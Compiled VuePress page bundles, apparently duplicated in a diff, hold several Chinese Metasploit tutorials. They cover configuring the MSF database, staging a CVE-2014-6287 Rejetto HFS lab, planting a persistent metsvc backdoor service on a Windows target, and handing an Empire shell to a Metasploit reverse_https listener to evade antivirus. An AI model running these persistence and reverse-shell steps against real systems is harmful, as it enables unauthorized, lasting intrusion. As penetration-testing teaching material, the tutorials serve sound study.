默认密码,是否允许远程登录")]),s._v(" "),a("h2",{attrs:{id:"初始化msf数据库-关键步骤"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#初始化msf数据库-关键步骤"}},[s._v("#")]),s._v(" 初始化MSF数据库(关键步骤)")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("msfdb init\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"启动-msfconsole"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#启动-msfconsole"}},[s._v("#")]),s._v(" 启动 msfconsole")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("msfconsole\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"检测-db-连接状态"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#检测-db-连接状态"}},[s._v("#")]),s._v(" 检测 db 连接状态")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("db_status\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"如果连接异常会显示"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#如果连接异常会显示"}},[s._v("#")]),s._v(" 如果连接异常会显示")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("msf > db_status\n[*] postgresql selected, no connection\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br")])]),a("h2",{attrs:{id:"手动连接数据库"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#手动连接数据库"}},[s._v("#")]),s._v(" 手动连接数据库")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("msf > db_connect msf:admin@127.0.0.1/msf\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"如果不想每次都手动连接-可以修改配置文件-设置数据库密码"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#如果不想每次都手动连接-可以修改配置文件-设置数据库密码"}},[s._v("#")]),s._v(" 如果不想每次都手动连接,可以修改配置文件,设置数据库密码")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("vim /usr/share/metasploit-framework/config/database.yml\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("p",[s._v("将 password 修改为 你的密码")]),s._v(" "),a("h1",{attrs:{id:"写在最后"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),a("blockquote",[a("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),a("p",[a("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);a.default=r.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[260],{550:function(s,a,t){"use strict";t.r(a);var e=t(7),r=Object(e.a)({},(function(){var s=this,a=s._self._c;return a("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[a("h1",{attrs:{id:"kali-metasploit-连接-postgresql-默认密码"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#kali-metasploit-连接-postgresql-默认密码"}},[s._v("#")]),s._v(" kali Metasploit 连接 Postgresql 默认密码")]),s._v(" "),a("h2",{attrs:{id:"启动-postgresql"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#启动-postgresql"}},[s._v("#")]),s._v(" 启动 postgresql")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("service postgresql start\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("p",[s._v("postgresql开机自启动")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("update-rc.d postgresql enable\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"自行测试-postgresql-是否安装成功"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#自行测试-postgresql-是否安装成功"}},[s._v("#")]),s._v(" 自行测试 postgresql 是否安装成功")]),s._v(" "),a("p",[s._v("根据需要,自行 修改 postgres 默认密码,是否允许远程登录")]),s._v(" "),a("h2",{attrs:{id:"初始化msf数据库-关键步骤"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#初始化msf数据库-关键步骤"}},[s._v("#")]),s._v(" 初始化MSF数据库(关键步骤)")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("msfdb init\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"启动-msfconsole"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#启动-msfconsole"}},[s._v("#")]),s._v(" 启动 msfconsole")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("msfconsole\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"检测-db-连接状态"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#检测-db-连接状态"}},[s._v("#")]),s._v(" 检测 db 连接状态")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("db_status\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"如果连接异常会显示"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#如果连接异常会显示"}},[s._v("#")]),s._v(" 如果连接异常会显示")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("msf > db_status\n[*] postgresql selected, no connection\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br")])]),a("h2",{attrs:{id:"手动连接数据库"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#手动连接数据库"}},[s._v("#")]),s._v(" 手动连接数据库")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("msf > db_connect msf:admin@127.0.0.1/msf\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"如果不想每次都手动连接-可以修改配置文件-设置数据库密码"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#如果不想每次都手动连接-可以修改配置文件-设置数据库密码"}},[s._v("#")]),s._v(" 如果不想每次都手动连接,可以修改配置文件,设置数据库密码")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("vim /usr/share/metasploit-framework/config/database.yml\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("p",[s._v("将 password 修改为 你的密码")]),s._v(" "),a("h1",{attrs:{id:"写在最后"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),a("blockquote",[a("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),a("p",[a("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);a.default=r.exports}}]);
\ No newline at end of file
此差异已折叠。
(window.webpackJsonp=window.webpackJsonp||[]).push([[262],{553:function(t,s,a){"use strict";a.r(s);var n=a(7),e=Object(n.a)({},(function(){var t=this,s=t._self._c;return s("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[s("h1",{attrs:{id:"对威胁建模-附加搭建cve-2014-6287漏洞环境"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#对威胁建模-附加搭建cve-2014-6287漏洞环境"}},[t._v("#")]),t._v(" 对威胁建模(附加搭建CVE:2014-6287漏洞环境)")]),t._v(" "),s("p",[t._v("攻击机: Kali 192.168.205.128")]),t._v(" "),s("p",[t._v("靶机: Win2012 R2 192.168.205.130")]),t._v(" "),s("p",[t._v("根据上一篇博文《"),s("a",{attrs:{href:"https://blog.csdn.net/l1028386804/article/details/86564219",target:"_blank",rel:"noopener noreferrer"}},[t._v("Metasploit实战一之——使用OpenVAS进行漏洞扫描"),s("OutboundLink")],1),t._v("》OpenVAS提供的扫描结果,可以看出目标计算机上存在的MS15-034漏洞,但是对这个漏洞的测试可能会引起目标计算机蓝屏宕机。在大多数渗透测试中,都应该避免使用Dos攻击方式。这里,我们选择一个HTTP文件服务器远程代码执行漏洞,编号为CVE 2014-6287。我们在Metasploit中查找这个漏洞对应的渗透模块。")]),t._v(" "),s("div",{staticClass:"language- line-numbers-mode"},[s("pre",{pre:!0,attrs:{class:"language-text"}},[s("code",[t._v("msf > search cve:2014-6287\n\nMatching Modules\n================\n\n Name Disclosure Date Rank Check Description\n ---- --------------- ---- ----- -----------\n exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution\n")])]),t._v(" "),s("div",{staticClass:"line-numbers-wrapper"},[s("span",{staticClass:"line-number"},[t._v("1")]),s("br"),s("span",{staticClass:"line-number"},[t._v("2")]),s("br"),s("span",{staticClass:"line-number"},[t._v("3")]),s("br"),s("span",{staticClass:"line-number"},[t._v("4")]),s("br"),s("span",{staticClass:"line-number"},[t._v("5")]),s("br"),s("span",{staticClass:"line-number"},[t._v("6")]),s("br"),s("span",{staticClass:"line-number"},[t._v("7")]),s("br"),s("span",{staticClass:"line-number"},[t._v("8")]),s("br")])]),s("p",[s("strong",[t._v("搭建CVE:2014-6287环境")])]),t._v(" "),s("p",[t._v("首先到链接:https://www.exploit-db.com/exploits/34926 下载漏洞程序")]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190120221941294.png",loading:"lazy"}})]),t._v(" "),s("p",[t._v("然后将下载的程序上传到目标机运行")]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190120221958158.png",loading:"lazy"}})]),t._v(" "),s("p",[t._v("这里,我们端口改为了8080,如下:")]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190120222014892.png",loading:"lazy"}})]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190120222024700.png",loading:"lazy"}})]),t._v(" "),s("p",[t._v("接下来,就是获取目标的控制权限了。")]),t._v(" "),s("h1",{attrs:{id:"写在最后"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[t._v("#")]),t._v(" 写在最后")]),t._v(" "),s("blockquote",[s("p",[t._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);s.default=e.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[262],{552:function(t,s,a){"use strict";a.r(s);var n=a(7),e=Object(n.a)({},(function(){var t=this,s=t._self._c;return s("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[s("h1",{attrs:{id:"对威胁建模-附加搭建cve-2014-6287漏洞环境"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#对威胁建模-附加搭建cve-2014-6287漏洞环境"}},[t._v("#")]),t._v(" 对威胁建模(附加搭建CVE:2014-6287漏洞环境)")]),t._v(" "),s("p",[t._v("攻击机: Kali 192.168.205.128")]),t._v(" "),s("p",[t._v("靶机: Win2012 R2 192.168.205.130")]),t._v(" "),s("p",[t._v("根据上一篇博文《"),s("a",{attrs:{href:"https://blog.csdn.net/l1028386804/article/details/86564219",target:"_blank",rel:"noopener noreferrer"}},[t._v("Metasploit实战一之——使用OpenVAS进行漏洞扫描"),s("OutboundLink")],1),t._v("》OpenVAS提供的扫描结果,可以看出目标计算机上存在的MS15-034漏洞,但是对这个漏洞的测试可能会引起目标计算机蓝屏宕机。在大多数渗透测试中,都应该避免使用Dos攻击方式。这里,我们选择一个HTTP文件服务器远程代码执行漏洞,编号为CVE 2014-6287。我们在Metasploit中查找这个漏洞对应的渗透模块。")]),t._v(" "),s("div",{staticClass:"language- line-numbers-mode"},[s("pre",{pre:!0,attrs:{class:"language-text"}},[s("code",[t._v("msf > search cve:2014-6287\n\nMatching Modules\n================\n\n Name Disclosure Date Rank Check Description\n ---- --------------- ---- ----- -----------\n exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution\n")])]),t._v(" "),s("div",{staticClass:"line-numbers-wrapper"},[s("span",{staticClass:"line-number"},[t._v("1")]),s("br"),s("span",{staticClass:"line-number"},[t._v("2")]),s("br"),s("span",{staticClass:"line-number"},[t._v("3")]),s("br"),s("span",{staticClass:"line-number"},[t._v("4")]),s("br"),s("span",{staticClass:"line-number"},[t._v("5")]),s("br"),s("span",{staticClass:"line-number"},[t._v("6")]),s("br"),s("span",{staticClass:"line-number"},[t._v("7")]),s("br"),s("span",{staticClass:"line-number"},[t._v("8")]),s("br")])]),s("p",[s("strong",[t._v("搭建CVE:2014-6287环境")])]),t._v(" "),s("p",[t._v("首先到链接:https://www.exploit-db.com/exploits/34926 下载漏洞程序")]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190120221941294.png",loading:"lazy"}})]),t._v(" "),s("p",[t._v("然后将下载的程序上传到目标机运行")]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190120221958158.png",loading:"lazy"}})]),t._v(" "),s("p",[t._v("这里,我们端口改为了8080,如下:")]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190120222014892.png",loading:"lazy"}})]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190120222024700.png",loading:"lazy"}})]),t._v(" "),s("p",[t._v("接下来,就是获取目标的控制权限了。")]),t._v(" "),s("h1",{attrs:{id:"写在最后"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[t._v("#")]),t._v(" 写在最后")]),t._v(" "),s("blockquote",[s("p",[t._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);s.default=e.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[263],{554:function(s,t,a){"use strict";a.r(t);var n=a(7),e=Object(n.a)({},(function(){var s=this,t=s._self._c;return t("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[t("h1",{attrs:{id:"metasploit设置永久访问权限"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#metasploit设置永久访问权限"}},[s._v("#")]),s._v(" Metasploit设置永久访问权限")]),s._v(" "),t("p",[s._v("攻击机: Kali 192.168.75.10")]),s._v(" "),t("p",[s._v("靶机: Windows Server 2012 192.168.75.130")]),s._v(" "),t("p",[s._v("此前提是经过一系列的渗透,已成功渗透靶机。")]),s._v(" "),t("p",[s._v("设置永久访问权限,需要在Meterpreter命令行中运行如下命令:")]),s._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[s._v("run metsvc -A\n")])]),s._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[s._v("1")]),t("br")])]),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190115155420509.png",loading:"lazy"}})]),s._v(" "),t("p",[s._v("当我们下次需要访问靶机的时候,只需要在攻击机上执行如下操作:")]),s._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[s._v("msfconsole\nuse exploit/multi/handler\nset payload windows/metsvc_bind_tcp\nset RHOST 192.168.75.130\nset LPORT 31337\nexploit\n")])]),s._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[s._v("1")]),t("br"),t("span",{staticClass:"line-number"},[s._v("2")]),t("br"),t("span",{staticClass:"line-number"},[s._v("3")]),t("br"),t("span",{staticClass:"line-number"},[s._v("4")]),t("br"),t("span",{staticClass:"line-number"},[s._v("5")]),t("br"),t("span",{staticClass:"line-number"},[s._v("6")]),t("br")])]),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190115155455181.png",loading:"lazy"}})]),s._v(" "),t("p",[s._v("看到,我们已经成功拿到Shell。")]),s._v(" "),t("h1",{attrs:{id:"写在最后"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),t("blockquote",[t("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);t.default=e.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[263],{553:function(s,t,a){"use strict";a.r(t);var n=a(7),e=Object(n.a)({},(function(){var s=this,t=s._self._c;return t("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[t("h1",{attrs:{id:"metasploit设置永久访问权限"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#metasploit设置永久访问权限"}},[s._v("#")]),s._v(" Metasploit设置永久访问权限")]),s._v(" "),t("p",[s._v("攻击机: Kali 192.168.75.10")]),s._v(" "),t("p",[s._v("靶机: Windows Server 2012 192.168.75.130")]),s._v(" "),t("p",[s._v("此前提是经过一系列的渗透,已成功渗透靶机。")]),s._v(" "),t("p",[s._v("设置永久访问权限,需要在Meterpreter命令行中运行如下命令:")]),s._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[s._v("run metsvc -A\n")])]),s._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[s._v("1")]),t("br")])]),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190115155420509.png",loading:"lazy"}})]),s._v(" "),t("p",[s._v("当我们下次需要访问靶机的时候,只需要在攻击机上执行如下操作:")]),s._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[s._v("msfconsole\nuse exploit/multi/handler\nset payload windows/metsvc_bind_tcp\nset RHOST 192.168.75.130\nset LPORT 31337\nexploit\n")])]),s._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[s._v("1")]),t("br"),t("span",{staticClass:"line-number"},[s._v("2")]),t("br"),t("span",{staticClass:"line-number"},[s._v("3")]),t("br"),t("span",{staticClass:"line-number"},[s._v("4")]),t("br"),t("span",{staticClass:"line-number"},[s._v("5")]),t("br"),t("span",{staticClass:"line-number"},[s._v("6")]),t("br")])]),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190115155455181.png",loading:"lazy"}})]),s._v(" "),t("p",[s._v("看到,我们已经成功拿到Shell。")]),s._v(" "),t("h1",{attrs:{id:"写在最后"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),t("blockquote",[t("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);t.default=e.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[264],{556:function(s,t,a){"use strict";a.r(t);var e=a(7),l=Object(e.a)({},(function(){var s=this,t=s._self._c;return t("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[t("h1",{attrs:{id:"empire-反弹回-metasploit"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#empire-反弹回-metasploit"}},[s._v("#")]),s._v(" Empire 反弹回 Metasploit")]),s._v(" "),t("p",[s._v("在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。 这里使用Empire的usemodule code_execution/invoke_shellcode模块修改两个参数:Lhost、Lport。将Lhost修改为MSF所在主机的IP,按以下命令设置:")]),s._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[s._v("set Lhost 192.168.31.247\nset Lport 4444\n")])]),s._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[s._v("1")]),t("br"),t("span",{staticClass:"line-number"},[s._v("2")]),t("br")])]),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/2019010920450179.jpg",loading:"lazy"}})]),s._v(" "),t("p",[s._v("在MSF上设置监听,命令如下:")]),s._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[s._v("use exploit/multi/handler\nset payload windows/meterpreter/reverse_https\nset lhost 192.168.31.247\nset lport 4444\nrun\n")])]),s._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[s._v("1")]),t("br"),t("span",{staticClass:"line-number"},[s._v("2")]),t("br"),t("span",{staticClass:"line-number"},[s._v("3")]),t("br"),t("span",{staticClass:"line-number"},[s._v("4")]),t("br"),t("span",{staticClass:"line-number"},[s._v("5")]),t("br")])]),t("p",[s._v("运行后,就可以收到Empire反弹回来的Shell")]),s._v(" "),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190109204848442.jpg",loading:"lazy"}})]),s._v(" "),t("h1",{attrs:{id:"写在最后"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),t("blockquote",[t("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);t.default=l.exports}}]);
\ No newline at end of file
